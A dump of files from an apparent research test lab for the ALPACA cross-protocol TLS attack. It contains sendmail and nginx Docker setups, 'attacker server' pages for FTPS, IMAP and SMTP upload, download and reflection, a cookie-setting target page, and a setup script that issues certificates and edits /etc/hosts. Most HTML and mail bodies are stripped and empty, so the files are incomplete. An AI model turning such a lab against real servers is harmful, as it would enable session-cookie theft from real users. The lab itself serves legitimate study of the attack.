plain 4 | Content-length: 78 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 |

13 | 14 |

15 | 16 | 17 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-cyrus/mails/2.eml: -------------------------------------------------------------------------------- 1 | X-Identity-Key: id1 2 | X-Account-Key: account1 3 | To: test 4 | From: test 5 | Subject: test 6 | Message-ID: <513fdb5e-6b6a-b208-8902-5dc0f6814e24@test> 7 | Date: Wed, 11 Sep 2019 10:27:01 +0200 8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) 9 | Gecko/20100101 Thunderbird/68.0 10 | MIME-Version: 1.0 11 | Content-Type: text/html; charset=utf-8 12 | Content-Language: en-GB 13 | Content-Transfer-Encoding: 7bit 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |

22 | 23 |

24 | 25 | 26 | -------------------------------------------------------------------------------- /testlab/servers/files/mail-sendmail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN echo "deb http://ftp.debian.org/debian experimental main contrib non-free" >> /etc/apt/sources.list 4 | 5 | RUN apt-get update && apt-get install -y openssl sendmail 6 | RUN apt-get update && apt-get install -y -t experimental sendmail sendmail-bin sendmail-base sendmail-cf 7 | 8 | ADD entrypoint.sh /opt/entrypoint.sh 9 | RUN chmod +x /opt/entrypoint.sh 10 | 11 | RUN echo "target.com" > /etc/hostname 12 | RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/sendmail.mc 13 | RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/submit.mc 14 | 15 | RUN echo "define(\`confCACERT_PATH', \`/opt/certs/')dnl" >> /etc/mail/sendmail.mc 16 | RUN echo "define(\`confSERVER_CERT', \`/opt/certs/target.com.crt')dnl" >> /etc/mail/sendmail.mc 17 | RUN echo "define(\`confSERVER_KEY', \`/opt/certs/target.com.key')dnl" >> /etc/mail/sendmail.mc 18 | RUN echo "define(\`confCLIENT_CERT', \`/opt/certs/target.com.crt')dnl" >> /etc/mail/sendmail.mc 19 | RUN echo "define(\`confCLIENT_KEY', \`/opt/certs/target.com.key')dnl" >> /etc/mail/sendmail.mc 20 | RUN echo "define(\`confLOG_LEVEL', \`14')" >> /etc/mail/sendmail.mc 21 | 22 | RUN sed -i 's/127.0.0.1/0.0.0.0/' /etc/mail/sendmail.mc 23 | 24 | RUN apt-get update && apt-get install -y nano netcat rsyslog 25 | 26 | ENTRYPOINT /opt/entrypoint.sh -------------------------------------------------------------------------------- /testlab/servers/files/mail-sendmail/entrypoint.sh: -------------------------------------------------------------------------------- 1 | cp -r /tmp/certs/ /opt/certs 2 | chmod -R 700 /opt/certs 3 | service rsyslog start 4 | service sendmail start 5 | bash 6 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/download/ftps.html: -------------------------------------------------------------------------------- 1 | 18 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/download/imap.html: -------------------------------------------------------------------------------- 1 |
2 | 7 | 8 |
9 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Attacker Server 6 | 7 | 8 |






9 |

FTPS

10 |

Upload

11 |

Download

12 |

POPS

13 |

Download

14 |

IMAPS

15 |

Upload

16 |

Upload

17 | 18 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/reflection/imap.html: -------------------------------------------------------------------------------- 1 |
2 | 7 | 8 |
9 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/reflection/smtp.html: -------------------------------------------------------------------------------- 1 |
2 | 5 | 6 |
-------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/upload/ftps.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-attacker/html/upload/imaps.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 23 | -------------------------------------------------------------------------------- /testlab/servers/files/nginx-target/html/index.php: -------------------------------------------------------------------------------- 1 | '/', 4 | 'domain' => $_SERVER['HTTP_HOST'], 5 | 'secure' => true, 6 | 'httponly' => true, 7 | ]); 8 | 9 | session_start(); 10 | ?> 11 |

Very Important Page!

12 | In the background a cookie was set with session_id for target.com -------------------------------------------------------------------------------- /testlab/setup.sh: -------------------------------------------------------------------------------- 1 | DIR="`pwd`/`dirname "$0"`/" 2 | GREEN="\033[0;32m" 3 | NC="\033[0m" 4 | 5 | cat << "EOF" 6 | _ _ ____ _ ____ _ 7 | / \ | | | _ \ / \ / ___| / \ 8 | / _ \ | | | |_) |/ _ \ | | / _ \ 9 | / ___ \ | |___ | __// ___ \| |___ / ___ \ 10 | /_/ \_\|_____||_| /_/ \_\\____|/_/ \_\ 11 | 12 | USE WITH CAUTION! 13 | 14 | EOF 15 | 16 | OS=`uname` 17 | 18 | echo -e "${GREEN}Building docker images (THIS WILL TAKE A WHILE!)${NC}" 19 | docker-compose -f servers/docker-compose.yml build --pull -q 20 | docker-compose -f servers/docker-compose.yml pull -q 2> /dev/null 21 | 22 | echo -e "${GREEN}Adding additional loopback IP${NC}" 23 | if [ "$OS" = "Darwin" ]; then 24 | ifconfig lo0 alias 127.0.0.2/8 up 25 | else 26 | ip addr add 127.0.0.2/8 dev lo 27 | fi 28 | 29 | echo -e "${GREEN}Installing dependencies${NC}" 30 | 31 | if [ "$OS" = "Darwin" ]; then 32 | brew install easy-rsa 33 | else 34 | apt-get install -y easy-rsa 35 | fi 36 | 37 | path="/usr/share/easy-rsa/" 38 | if [ "$OS" = "Darwin" ]; then 39 | path="" 40 | DIR_MAC="/usr/local/etc/" 41 | fi 42 | echo -e "${GREEN}[CERT] Creating PKI${NC}" 43 | ${path}easyrsa init-pki --pki-dir = "$DIR/pki" 44 | cat << EOF > "$DIR/pki/vars" 45 | set_var EASYRSA_DN "cn_only" 46 | set_var EASYRSA_DIGEST "sha512" 47 | set_var EASYRSA_BATCH "1" 48 | set_var EASYRSA_REQ_CN "alpaca.poc" 49 | EOF 50 | dd if=/dev/urandom of="$DIR/pki/.rnd" bs=256 count=1 2> /dev/null 51 | echo -e "${GREEN}[CERT] Build CA${NC}" 52 | ${path}easyrsa build-ca nopass 53 | 54 | #echo -e "${GREEN}[CERT] If you proceed, the generated CA will be added to your trusted CAs. Press any key to proceed${NC}" 55 | #read 56 | #cp "$DIR/pki/ca.crt" /usr/local/share/ca-certificates/alpaca.crt 57 | #update-ca-certificates 58 | 59 | echo -e "${GREEN}[CERT] Generating Certificates${NC}" 60 | ${path}easyrsa --req-cn="attacker.com" gen-req attacker.com nopass 61 | ${path}easyrsa sign-req server attacker.com 62 | 63 | if [ "$OS" = "Darwin" ]; then 64 | DIR_MAC="/usr/local/etc" 65 | else 66 | DIR_MAC=${DIR} 67 | fi 68 | 69 | mkdir -p "$DIR/servers/files/cert/" 2> /dev/null 70 | cp "$DIR_MAC/pki/issued/attacker.com.crt" "$DIR/servers/files/cert/" 71 | cp "$DIR_MAC/pki/private/attacker.com.key" "$DIR/servers/files/cert/" 72 | 73 | ${path}easyrsa --req-cn="target.com" gen-req target.com nopass 74 | ${path}easyrsa sign-req server target.com 75 | 76 | cp "$DIR_MAC/pki/issued/target.com.crt" "$DIR/servers/files/cert/" 77 | cp "$DIR_MAC/pki/private/target.com.key" "$DIR/servers/files/cert/" 78 | 79 | if ! grep ALPACA /etc/hosts; then 80 | echo -e "${GREEN}[HOST] Alter host file${NC}" 81 | 82 | sed -i '/# ALPACA/,/# END ALPACA/d' /etc/hosts 83 | echo "# ALPACA" >> /etc/hosts 84 | echo "127.0.0.1 attacker.com" >> /etc/hosts 85 | echo "127.0.0.2 target.com" >> /etc/hosts 86 | echo "# END ALPACA" >> /etc/hosts 87 | fi 88 | --------------------------------------------------------------------------------